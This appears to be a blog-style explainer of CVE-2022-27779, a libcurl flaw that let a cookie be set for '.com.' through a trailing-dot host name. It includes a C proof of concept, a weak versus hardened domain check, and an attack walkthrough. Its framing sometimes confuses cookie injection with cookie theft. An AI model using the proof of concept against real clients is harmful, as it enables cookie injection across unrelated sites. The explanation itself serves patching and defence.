In 2022, a somewhat obscure yet critical security flaw was disclosed in libcurl, the widely used data transfer library. The bug, tracked as CVE-2022-27779, allowed attackers to set cookies for Top Level Domains (TLDs) using a crafty trick: simply adding a trailing dot in the host name.
This long read breaks down how this bug worked, shows you code snippets, and explains how attackers could exploit it. If you’re building or maintaining software that pulls in curl or libcurl for HTTP requests, this one’s worth your full attention.
Before we jump into the details, let's get our terms straight:
- libcurl: The C library powering tools like curl for transferring data with URLs. Commonly used in everything from bash scripts to big systems.
- Cookies: Small text bits that browsers (and curl) use to remember state, login info, preferences, etc.
- Public Suffix List (PSL): The official list of domain suffixes, used to prevent cookies from being set for TLDs (like .com), making sure cookies stay in their lane.
- Host with trailing dot: A domain name provided as, say, example.com. instead of example.com. Both technically resolve to the same place, but not all tools treat them the same.
The Core Issue
When PSL support in curl is disabled (which is often the case to avoid extra dependencies), libcurl does a simple check to prevent setting cookies for TLDs. But if you end your host name with a ., like example.com., this check is bypassed—letting you set cookies for TLDs!
This can allow an attacker to trick a client into saving cookies for .com. (not just .com). Then, future requests to *other* .com sites with a trailing dot might get these cookies sent unexpectedly, crossing security boundaries.
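To make the "simple check" concrete, here is an added illustration in C (my own simplified reconstruction, not curl's source): it assumes, as the description above implies, that the pre-fix check only asked whether the cookie's Domain attribute contained a dot, so `.com.` slipped through. The hardened variant canonicalizes the trailing dot away before checking, so a bare TLD is rejected with or without it. The function names `weak_domain_ok` and `hardened_domain_ok` are mine.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Weak check (illustrative reconstruction, not curl's source): accept a cookie
   Domain attribute as long as it contains a dot. "com." contains one, so a bare
   TLD with a trailing dot is accepted; this is the class of check that
   CVE-2022-27779 bypassed. */
bool weak_domain_ok(const char *domain)
{
    if (domain[0] == '.')                 /* ignore the leading dot of ".com." */
        domain++;
    if (strcasecmp(domain, "localhost") == 0)
        return true;
    return strchr(domain, '.') != NULL;
}

/* Hardened check: canonicalize first (drop the leading dot and ONE trailing
   FQDN dot), then require a dot that still separates two non-empty labels.
   "com." and "com" are now rejected alike; "example.com." is accepted. */
bool hardened_domain_ok(const char *domain)
{
    char buf[256];
    size_t len;

    if (domain[0] == '.')
        domain++;
    len = strlen(domain);
    if (len == 0 || len >= sizeof buf)
        return false;
    memcpy(buf, domain, len + 1);
    if (buf[len - 1] == '.')              /* "com." -> "com" */
        buf[--len] = '\0';
    if (len == 0 || buf[0] == '.' || buf[len - 1] == '.' || strstr(buf, ".."))
        return false;                     /* empty label somewhere */
    if (strcasecmp(buf, "localhost") == 0)
        return true;
    return strchr(buf, '.') != NULL;      /* "com" -> false, "example.com" -> true */
}

int main(void)
{
    const char *samples[] = { ".com.", ".com", "example.com.", "localhost", "a..b" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-13s weak=%d hardened=%d\n", samples[i],
               weak_domain_ok(samples[i]), hardened_domain_ok(samples[i]));
    return 0;
}
```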
Demonstration
Let’s walk through a code snippet to show this in action.
```c
#include <stdio.h>
#include <curl/curl.h>

int main(void) {
    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if(curl) {
        // Enable the in-memory cookie engine so the injected cookie is stored and matched
        curl_easy_setopt(curl, CURLOPT_COOKIEFILE, "");
        // Intentionally use the trailing dot
        curl_easy_setopt(curl, CURLOPT_URL, "http://victim.com./");
        // Simulate a Set-Cookie header for a top-level domain by feeding it to the
        // cookie engine in Set-Cookie format (on a vulnerable build without PSL,
        // the ".com." domain passes the TLD check)
        curl_easy_setopt(curl, CURLOPT_COOKIELIST,
                         "Set-Cookie: SESSIONID=stealme; domain=.com.; path=/");
        // Make a request to a _different_ site within .com using a trailing dot
        curl_easy_setopt(curl, CURLOPT_URL, "http://another.com./");
        // This will send the SESSIONID cookie to another.com., which is not intended
        CURLcode res = curl_easy_perform(curl);
        if(res == CURLE_OK)
            printf("Request sent!\n");
        else
            fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
        curl_easy_cleanup(curl);
    }
    curl_global_cleanup();
    return 0;
}
```
Result: SESSIONID=stealme is sent to every *.com. host you access with a trailing dot, thanks to the cookie's domain attribute being set to .com.. This shouldn't be allowed!
Step 1: The Setup
A malicious site (let’s call it evil.example.com) sends a Set-Cookie header setting the domain to .com.:
Set-Cookie: SESSIONID=evil; Domain=.com.; Path=/
Your app, using libcurl, pulls in this cookie if it doesn’t have PSL enabled and the domain you fetched had a trailing dot in the host.
Step 2: The Leak
Later, your app makes a request to bank.com. (note the trailing dot!). To libcurl, this matches the previously set cookie for .com., so it automatically sends SESSIONID=evil with the request. Now, your SESSIONID cookie is presented at an unrelated .com site—a cookie leak!
Why is this bad?
The bypass does not work when either of the following holds:
- PSL support is enabled (rare due to extra dependencies)
- Hostnames are strictly validated/normalized without trailing dots
Otherwise, an attack looks like this:
- Attacker hosts the payload at attacksite.com.
- Sends Set-Cookie: user=1337; Domain=.com.; Path=/
- Later, the client downloads from bank.com. (with trailing dot in hostname)
How to Fix and Protect Yourself
The official curl advisory recommends upgrading to curl 7.83.1 or newer, which has a proper fix. You can see whether your curl build has PSL support from the Features line of `curl --version`, which lists PSL when libpsl is compiled in.
References:
- curl security advisory
- libcurl changelog
Conclusion
CVE-2022-27779 highlights how small, quirky parts of HTTP standards—like dots at the end of a domain—can break cookie security. If your applications use libcurl or curl and support cookies, check your version, settings, and how domains are handled. This bug is a good reminder: Trust no unchecked input, and always keep up with security advisories!
For more technical background
- Official curl CVE-2022-27779 page
- Public Suffix List
- curl/libcurl changelog
Timeline
Published on: 06/02/2022 14:15:00 UTC
Last modified on: 06/22/2022 13:48:00 UTC